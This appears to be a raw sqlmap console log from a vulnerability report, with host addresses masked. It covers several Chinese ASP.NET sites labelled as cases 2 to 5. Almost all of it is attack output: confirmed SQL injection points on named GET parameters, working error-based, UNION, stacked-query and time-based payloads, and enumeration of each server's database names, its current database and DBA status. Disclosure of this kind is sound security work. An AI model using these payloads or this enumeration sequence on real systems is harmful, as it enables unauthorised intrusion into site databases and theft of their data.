[*] tempdb
[*] WebFiles
[14:04:43] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 14 times
[14:04:43] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:04:43
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/list.aspx?stid=6041 --
current-db
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:08:44
[14:08:44] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:08:44] [INFO] testing connection to the target URL
[14:08:44] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: stid (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(118)+CHAR(113)+(SELE
CT (CASE WHEN (3618=3618) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+
CHAR(107)+CHAR(98)+CHAR(113))
---
[14:08:45] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 0
back-end DBMS: Microsoft SQL Server 2008
[14:08:45] [INFO] fetching current database
current database:       None
[14:08:45] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:08:45
C:\Python27\sqlmap>
案列5.
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/pinggu/result.aspx?id=1
051 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:06:14
[14:06:14] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:06:14] [INFO] testing connection to the target URL
[14:06:14] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1051 AND 3295=3295
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1051 AND 4567=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(120)+
CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4567=4567) THEN CHAR(49) ELSE CHAR(48) E
ND))+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)))
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=1051;WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1051 WAITFOR DELAY '0:0:5'
---
[14:06:15] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:06:15] [INFO] fetching database names
[14:06:18] [WARNING] the SQL query provided does not return any output
[14:06:18] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[14:06:18] [INFO] fetching number of databases
[14:06:19] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[14:06:19] [INFO] retrieved:
[14:06:19] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..........................
[14:06:22] [CRITICAL] considerable lagging has been detected in connection respo
nse(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or
 more)
[14:06:22] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
[14:06:22] [ERROR] unable to retrieve the number of databases
[14:06:22] [INFO] retrieved: 91haofang
[14:06:22] [INFO] retrieved: master
[14:06:22] [INFO] retrieved: tempdb
[14:06:22] [INFO] retrieved: model
[14:06:22] [INFO] retrieved: msdb
[14:06:22] [INFO] retrieved: ReportServer
[14:06:22] [INFO] retrieved: ReportServerTempDB
[14:06:23] [INFO] retrieved: SDSW20_Main
[14:06:23] [INFO] retrieved: SDSW20_HR
[14:06:23] [INFO] retrieved: jiaju
[14:06:23] [INFO] retrieved: cms_newair
[14:06:23] [INFO] retrieved: SD_QIYE
[14:06:23] [INFO] retrieved: SDSW20_Video
[14:06:23] [INFO] retrieved: yycar
[14:06:23] [INFO] retrieved: SDSW20_Digg
[14:06:23] [INFO] retrieved: SDSW20_Rank
[14:06:24] [INFO] retrieved: SDSW20_Ask
[14:06:24] [INFO] retrieved: adv_new
[14:06:24] [INFO] retrieved: SDSW20_Other
[14:06:24] [INFO] retrieved: 91haofang
[14:06:24] [INFO] retrieved: SDSW20_Ads
[14:06:24] [INFO] retrieved: SDSW20_Video_old
[14:06:24] [INFO] retrieved: bbs
[14:06:24] [INFO] retrieved:
available databases [22]:
[*] 91haofang
[*] adv_new
[*] bbs
[*] cms_newair
[*] jiaju
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] SD_QIYE
[*] SDSW20_Ads
[*] SDSW20_Ask
[*] SDSW20_Digg
[*] SDSW20_HR
[*] SDSW20_Main
[*] SDSW20_Other
[*] SDSW20_Rank
[*] SDSW20_Video
[*] SDSW20_Video_old
[*] tempdb
[*] yycar
[14:06:24] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 24 times
[14:06:24] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:06:24
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/pinggu/result.aspx?id=1
051 --current-db
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:09:57
[14:09:57] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:09:57] [INFO] testing connection to the target URL
[14:09:57] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1051 AND 3295=3295
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1051 AND 4567=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(120)+
CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4567=4567) THEN CHAR(49) ELSE CHAR(48) E
ND))+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)))
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=1051;WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1051 WAITFOR DELAY '0:0:5'
---
[14:09:58] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:09:58] [INFO] fetching current database
[14:09:58] [INFO] retrieved: 91haofang
current database:    '91haofang'
[14:09:58] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[14:09:58] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:09:58
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/pinggu/result.aspx?id=1
案例4. 
Microsoft Windows [版本 6.3.9600]
(c) 2013 Microsoft Corporation。保留所有权利。
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/quxian/List.aspx?AreaI
nfoID=119
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:07:03
[14:07:03] [INFO] testing connection to the target URL
[14:07:03] [WARNING] reflective value(s) found and filtering out
[14:07:03] [INFO] testing if the target URL is stable
[14:07:04] [INFO] target URL is stable
[14:07:04] [INFO] testing if GET parameter 'AreaInfoID' is dynamic
[14:07:04] [INFO] confirming that GET parameter 'AreaInfoID' is dynamic
[14:07:05] [WARNING] GET parameter 'AreaInfoID' does not appear dynamic
[14:07:05] [WARNING] heuristic (basic) test shows that GET parameter 'AreaInfoID
' might not be injectable
[14:07:05] [INFO] heuristic (XSS) test shows that GET parameter 'AreaInfoID' mig
ht be vulnerable to XSS attacks
[14:07:05] [INFO] testing for SQL injection on GET parameter 'AreaInfoID'
[14:07:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:07:07] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[14:07:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[14:07:09] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:07:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[14:07:11] [INFO] GET parameter 'AreaInfoID' is 'Microsoft SQL Server/Sybase AND
 error-based - WHERE or HAVING clause' injectable
it looks like the back-end DBMS is '['Microsoft SQL Server', 'Sybase']'. Do you
want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for '['Microsoft SQL S
erver', 'Sybase']' extending provided level (1) and risk (1) values? [Y/n]
[14:07:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:07:12] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[14:07:17] [INFO] target URL appears to be UNION injectable with 1 columns
[14:07:18] [INFO] GET parameter 'AreaInfoID' is 'Generic UNION query (NULL) - 1
to 20 columns' injectable
GET parameter 'AreaInfoID' is vulnerable. Do you want to keep testing the others
 (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) re
quests:
---
Parameter: AreaInfoID (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: AreaInfoID=119) AND 9428=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CH
AR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9428=9428) THEN CHAR(49) ELSE CH
AR(48) END))+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113))) AND (8109=8109
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: AreaInfoID=119) UNION ALL SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR
(112)+CHAR(113)+CHAR(70)+CHAR(86)+CHAR(117)+CHAR(100)+CHAR(86)+CHAR(85)+CHAR(90)
+CHAR(118)+CHAR(88)+CHAR(104)+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113)-
-
---
[14:07:19] [INFO] testing Microsoft SQL Server
[14:07:20] [INFO] confirming Microsoft SQL Server
[14:07:21] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:07:21] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[14:07:21] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:07:21
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/quxian/List.aspx?AreaI
nfoID=119 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:07:24
[14:07:24] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:07:25] [INFO] testing connection to the target URL
[14:07:25] [WARNING] reflective value(s) found and filtering out
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: AreaInfoID (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: AreaInfoID=119) AND 9428=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CH
AR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9428=9428) THEN CHAR(49) ELSE CH
AR(48) END))+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113))) AND (8109=8109
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: AreaInfoID=119) UNION ALL SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR
(112)+CHAR(113)+CHAR(70)+CHAR(86)+CHAR(117)+CHAR(100)+CHAR(86)+CHAR(85)+CHAR(90)
+CHAR(118)+CHAR(88)+CHAR(104)+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113)-
-
---
[14:07:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:07:25] [INFO] fetching database names
[14:07:25] [INFO] the SQL query used returns 12 entries
[14:07:26] [INFO] retrieved: 91haofang
[14:07:26] [INFO] retrieved: Man_adv
[14:07:27] [INFO] retrieved: master
[14:07:27] [INFO] retrieved: model
[14:07:27] [INFO] retrieved: msdb
[14:07:28] [INFO] retrieved: NewsAPP
[14:07:28] [INFO] retrieved: ReportServer
[14:07:29] [INFO] retrieved: ReportServerTempDB
[14:07:29] [INFO] retrieved: SDSW20_Main
[14:07:30] [INFO] retrieved: SDSW20_News
[14:07:30] [INFO] retrieved: tempdb
[14:07:30] [INFO] retrieved: WebFiles
available databases [12]:
[*] 91haofang
[*] Man_adv
[*] master
[*] model
[*] msdb
[*] NewsAPP
[*] ReportServer
[*] ReportServerTempDB
[*] SDSW20_Main
[*] SDSW20_News
[*] tempdb
[*] WebFiles
[14:07:31] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:07:31
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/quxian/List.aspx?AreaI
nfoID=119 --current-db
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:09:26
[14:09:27] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:09:27] [INFO] testing connection to the target URL
[14:09:28] [WARNING] reflective value(s) found and filtering out
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: AreaInfoID (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: AreaInfoID=119) AND 9428=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CH
AR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9428=9428) THEN CHAR(49) ELSE CH
AR(48) END))+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113))) AND (8109=8109
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: AreaInfoID=119) UNION ALL SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR
(112)+CHAR(113)+CHAR(70)+CHAR(86)+CHAR(117)+CHAR(100)+CHAR(86)+CHAR(85)+CHAR(90)
+CHAR(118)+CHAR(88)+CHAR(104)+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113)-
-
---
[14:09:28] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:09:28] [INFO] fetching current database
current database:    'SDSW20_News'
[14:09:28] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:09:28
C:\Python27\sqlmap>
案例3.
C:\Python27\sqlmap>Sqlmap.py -u http://**.**.**.**/List.aspx?stid=5781
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:17:05
[14:17:06] [INFO] testing connection to the target URL
[14:17:06] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
[14:17:07] [INFO] testing if the target URL is stable
[14:17:07] [INFO] target URL is stable
[14:17:07] [INFO] testing if GET parameter 'stid' is dynamic
[14:17:08] [INFO] confirming that GET parameter 'stid' is dynamic
[14:17:08] [WARNING] GET parameter 'stid' does not appear dynamic
[14:17:08] [WARNING] heuristic (basic) test shows that GET parameter 'stid' migh
t not be injectable
[14:17:08] [INFO] testing for SQL injection on GET parameter 'stid'
[14:17:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:17:08] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[14:17:09] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[14:17:09] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:17:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[14:17:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[14:17:10] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[14:17:10] [INFO] testing 'MySQL inline queries'
[14:17:10] [INFO] testing 'PostgreSQL inline queries'
[14:17:10] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[14:17:10] [INFO] GET parameter 'stid' is 'Microsoft SQL Server/Sybase inline qu
eries' injectable
it looks like the back-end DBMS is '['Microsoft SQL Server', 'Sybase']'. Do you
want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for '['Microsoft SQL S
erver', 'Sybase']' extending provided level (1) and risk (1) values? [Y/n]
[14:17:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:17:12] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[14:17:12] [WARNING] reflective value(s) found and filtering out
[14:17:13] [WARNING] parameter length constrainting mechanism detected (e.g. Suh
osin patch). Potential problems in enumeration phase can be expected
GET parameter 'stid' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N]
sqlmap identified the following injection point(s) with a total of 64 HTTP(s) re
quests:
---
Parameter: stid (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(113)+(SEL
ECT (CASE WHEN (9289=9289) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)
+CHAR(107)+CHAR(112)+CHAR(113))
---
[14:17:15] [INFO] testing Microsoft SQL Server
[14:17:16] [INFO] confirming Microsoft SQL Server
[14:17:16] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:17:16] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 61 times, 500 (Internal Server Error) - 10 times
[14:17:16] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:17:16
C:\Python27\sqlmap>Sqlmap.py -u http://**.**.**.**/List.aspx?stid=5781 --d
bs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:17:20
[14:17:21] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:17:21] [INFO] testing connection to the target URL
[14:17:21] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: stid (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(113)+(SEL
ECT (CASE WHEN (9289=9289) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)
+CHAR(107)+CHAR(112)+CHAR(113))
---
[14:17:22] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:17:22] [INFO] fetching database names
[14:17:22] [WARNING] the SQL query provided does not return any output
[14:17:22] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[14:17:22] [INFO] retrieved: SDSW20_News
[14:17:23] [INFO] retrieved: master
[14:17:23] [INFO] retrieved: tempdb
[14:17:23] [INFO] retrieved: model
[14:17:24] [INFO] retrieved: msdb
[14:17:24] [INFO] retrieved: ReportServer
[14:17:24] [INFO] retrieved: ReportServerTempDB
[14:17:24] [INFO] retrieved: SDSW20_News
[14:17:24] [INFO] retrieved: Man_adv
[14:17:25] [INFO] retrieved: SDSW20_Main
[14:17:25] [INFO] retrieved: WebFiles
[14:17:25] [INFO] retrieved: NewsAPP
[14:17:25] [INFO] retrieved: 91haofang
[14:17:26] [INFO] retrieved:
available databases [12]:
[*] 91haofang
[*] Man_adv
[*] master
[*] model
[*] msdb
[*] NewsAPP
[*] ReportServer
[*] ReportServerTempDB
[*] SDSW20_Main
[*] SDSW20_News
[*] tempdb
[*] WebFiles
[14:17:26] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 2 times, 500 (Internal Server Error) - 14 times
[14:17:26] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:17:26
C:\Python27\sqlmap>Sqlmap.py -u http://**.**.**.**/List.aspx?stid=5781 --c
urrent-db
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:17:33
[14:17:34] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:17:34] [INFO] testing connection to the target URL
[14:17:34] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: stid (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(113)+(SEL
ECT (CASE WHEN (9289=9289) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)
+CHAR(107)+CHAR(112)+CHAR(113))
---
[14:17:35] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:17:35] [INFO] fetching current database
current database:       None
[14:17:35] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 2 times
[14:17:35] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:17:35
C:\Python27\sqlmap>Sqlmap.py -u http://**.**.**.**/List.aspx?stid=5781 --i
s-dba
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:18:29
[14:18:30] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:18:30] [INFO] testing connection to the target URL
[14:18:30] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: stid (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(113)+(SEL
ECT (CASE WHEN (9289=9289) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)
+CHAR(107)+CHAR(112)+CHAR(113))
---
[14:18:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:18:31] [INFO] testing if current user is DBA
current user is DBA:    False
[14:18:31] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 2 times
[14:18:31] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:18:31
C:\Python27\sqlmap>
案例2.
Microsoft Windows [版本 6.3.9600]
(c) 2013 Microsoft Corporation。保留所有权利。
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/special/2013/sbjszqh/lis
t.aspx?stid=5446&pageid=2
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:20:54
[14:20:54] [INFO] testing connection to the target URL
[14:20:55] [WARNING] reflective value(s) found and filtering out
[14:20:55] [INFO] testing if the target URL is stable
[14:20:56] [INFO] target URL is stable
[14:20:56] [INFO] testing if GET parameter 'stid' is dynamic
[14:20:56] [INFO] confirming that GET parameter 'stid' is dynamic
[14:20:56] [INFO] GET parameter 'stid' is dynamic
[14:20:56] [INFO] heuristic (basic) test shows that GET parameter 'stid' might b
e injectable (possible DBMS: 'Microsoft SQL Server')
[14:20:56] [INFO] testing for SQL injection on GET parameter 'stid'
it looks like the back-end DBMS is 'Microsoft SQL Server'. Do you want to skip t
est payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'Microsoft SQL Ser
ver' extending provided level (1) and risk (1) values? [Y/n]
[14:20:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:20:59] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par
ameter replace'
[14:20:59] [INFO] GET parameter 'stid' seems to be 'Microsoft SQL Server/Sybase
boolean-based blind - Parameter replace' injectable (with --string="\u7b56\u5212
\u3001\u5236\u4f5c\uff1a")
[14:20:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[14:20:59] [INFO] GET parameter 'stid' is 'Microsoft SQL Server/Sybase AND error
-based - WHERE or HAVING clause' injectable
[14:20:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[14:20:59] [INFO] GET parameter 'stid' is 'Microsoft SQL Server/Sybase inline qu
eries' injectable
[14:20:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)
'
